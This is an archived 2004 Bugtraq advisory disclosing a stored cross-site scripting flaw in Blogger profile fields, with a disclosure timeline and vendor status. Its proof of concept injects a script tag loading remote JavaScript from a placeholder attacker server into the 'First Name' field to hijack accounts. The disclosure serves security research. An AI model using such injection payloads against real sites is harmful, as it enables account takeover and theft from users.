Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Blogger XSS Vulnerability
From: "Ferruh Mavituna" <ferruh () mavituna com>
Date: Fri, 26 Mar 2004 23:07:18 +0200
------------------------------------------------------
BLOGGER XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent User Account
Hijacking)

------------------------------------------------------
ABOUT BLOGGER;
------------------------------------------------------
Blogger is a web-based tool that helps you publish to the web instantly --
whenever the urge strikes. Blogger is the leading tool in the rapidly
growing area of web publishing known as weblogs, or "blogs."

by Google (Pyra Labs acquired by Google)

------------------------------------------------------
XSS DETAILS;
------------------------------------------------------
There is no HTML filter when rendering user profiles. So anyone can inject a
script into a profile's "First Name" "Last Name" etc.

If you inject a code into "First Name" this will be print and run in users's
first page [www.blogger.com], so an attacker can easily gain victim's
account.



        ------------------------------------------------------
        Proof Of Concept;
        ------------------------------------------------------
        Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to
victim "First Name"
        Now you can execute anything in remote.

        After login as your victim;
                  I. You can change password (without old password)
                 II. You can change e-mail address without any confirmation
                III. You can own the victim blogs

        
        *Replace ][,<>
        *Script injection is limited to 50 characters (but it's pretty
enough to add js script)


-----------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 2/22/2004
Vendor Informed : 2/25/2004
Published : 3/26/2004

------------------------------------------------------
VENDOR STATUS;
------------------------------------------------------
Contact established with Google but there is no answer.

Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh () mavituna com

PGPKey : http://ferruh.mavituna.com/PGPKey.asc

  By Date           By Thread  

Current thread:
  • Blogger XSS Vulnerability Ferruh Mavituna (Mar 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]